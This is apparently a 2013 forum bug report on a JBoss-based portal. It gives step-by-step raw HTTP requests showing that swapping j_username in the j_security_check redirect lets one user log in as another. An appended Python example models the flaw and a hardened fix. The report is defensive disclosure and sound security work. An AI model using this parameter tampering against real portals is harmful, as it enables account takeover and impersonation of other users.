8 Replies Latest reply on Dec 16, 2013 9:44 PM by Hai Nguyen

    How to avoid bypass authentication (detail test steps)

    Wells G Novice

      Steps to Reproduce:

      1. Log into our portal project with correct username and password

       

      POST /portal/login HTTP/1.1

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer:http://XXXX/home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

      Content-Type: application/x-www-form-urlencoded

      Content-Length: 84

       

      initialURI=%2Fportal%2Fprivate%2Fxxxx0%2Fhome&username=userA&password=xxxx

       

      2. Get a 302 response and open the /portal/private/project/home page

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:19:48 GMT

      X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1

      Location: http://XXXX//home

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

      Content-Type: text/plain; charset=UTF-8

       

      GET /portal/private/xxxx/home HTTP/1.1

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer: http://XXXX//home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

       

      3. Get a 302 response again, which redirects to the security check page with the username; modify the username to someone else who is logged in.

       

      Original message:

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:29:42 GMT

      Pragma: No-cache

      Cache-Control: no-cache

      Expires: Wed, 31 Dec 1969 19:00:00 EST

      Location:http://XXXX//portal/private/xxxx/j_security_check?j_username=userA&j_password=rememberme1447024746

        ^^^^^^^^^^^^^^^^^

      Content-Type: text/html;charset=UTF-8

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

       

      Modified message:

       

      HTTP/1.1 302 Moved Temporarily

      Date: Thu, 15 Aug 2013 07:29:42 GMT

      Pragma: No-cache

      Cache-Control: no-cache

      Expires: Wed, 31 Dec 1969 19:00:00 EST

      Location: http://XXXX//portal/private/xxxx/j_security_check?j_username=userB&j_password=rememberme1447024746

        ^^^^^^^^^^^^^^^^

      Content-Type: text/html;charset=UTF-8

      Content-Length: 0

      Keep-Alive: timeout=15, max=100

      Connection: Keep-Alive

       

      4. Send a GET request for the page in "Location" of step 3, which has username "userB"

       

      GET /portal/private/xxx/j_security_check?j_username=userB&j_password=rememberme1447024746 HTTP/1.1

      ^^^^^^^^^^^^^^^^^^

      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0

      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

      Accept-Language: en-US,en;q=0.5

      Accept-Encoding: gzip, deflate

      Referer: http://XXXX/portal/private/xxxx/home?portal:componentId=UIPortal&portal:action=Logout

      Cookie: s_vi=[CS]v1|28EA91FC051D0C67-6000012D0022FE71[CE]; LOCALE=en; __utma=185718442.2127140870.1375753347.1375949446.1375956336.6; __utmz=185718442.1375753347.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rh_omni_tc=70160000000H4AoAAK; __utmc=185718442; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=OWtMF08HGwjlkDYd+ocNFA__; s_fid=5E3538E66F23E79E-217322C448997A94; s_ria=flash%2011%7Csilverlight%20not%20detected; s_nr=1376462032265; s_vnum=1379054032265%26vn%3D1; rh_elqCustomerGUID=c93529bc-f6c8-4a28-b8b1-59e8152d01ff

      Connection: keep-alive

       

      5. Get the response with code 302 and redirect to the home page, attachment1.

       

      6. Click the content tab in the home page; it now displays login with "userB", and operations can be performed as userB too.

       

      Actual results:

      Successfully bypasses authentication.

       

      Expected results:

      Should not log into the project with "userB" successfully.
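Added example (not from the original post or the portal's own code): a minimal model of the step 3 handoff, where the portal redirects the browser to j_security_check with j_username and a server-issued j_password token, showing a check that mirrors the reported behaviour beside a hardened one that binds the token to the user and makes it single-use. The path, the userA/userB names and the HMAC token format are assumptions; the portal's real remember-me token is not modelled.

```python
import hashlib, hmac, secrets, time
from urllib.parse import parse_qs, quote, urlsplit

# Constructed for this example: a real deployment loads the key from protected config.
SERVER_KEY = secrets.token_bytes(32)
USED_NONCES = set()  # in-memory record of consumed one-time tokens (constructed)

def issue_login_token(username, ttl=60, now=None):
    """Issue a short-lived one-time token: username|exp|nonce|HMAC(key, username|exp|nonce)."""
    now = int(time.time()) if now is None else now
    body = f"{username}|{now + ttl}|{secrets.token_hex(8)}"
    tag = hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}|{tag}"

def redirect_location(username, token):
    """Build the Location value the portal sends in step 3 (path taken from the report)."""
    return f"/portal/private/xxxx/j_security_check?j_username={quote(username)}&j_password={quote(token)}"

def _verify_token(token, now):
    """Return the username the token was issued for, or None if it is forged or expired."""
    parts = token.split("|")
    if len(parts) != 4:
        return None
    username, exp, nonce, tag = parts
    expected = hmac.new(SERVER_KEY, f"{username}|{exp}|{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag) or now >= int(exp):
        return None
    return username

def weak_security_check(location, now):
    """Reproduces the reported flaw: the token is genuine, so j_username is trusted as submitted."""
    q = parse_qs(urlsplit(location).query)
    if _verify_token(q["j_password"][0], now) is None:
        return None
    return q["j_username"][0]  # attacker-controlled: userB logs in with userA's token

def strict_security_check(location, now):
    """Hardened: the token must be bound to j_username and may be used only once."""
    q = parse_qs(urlsplit(location).query)
    token = q["j_password"][0]
    bound_user = _verify_token(token, now)
    nonce = token.split("|")[2] if bound_user else None
    if bound_user is None or bound_user != q["j_username"][0] or nonce in USED_NONCES:
        return None
    USED_NONCES.add(nonce)
    return bound_user
```

The weak check accepts the swapped j_username because it only asks whether the token is valid, not whom it was issued to; the strict check fails the tampered redirect, and also rejects replay of an already used or expired token.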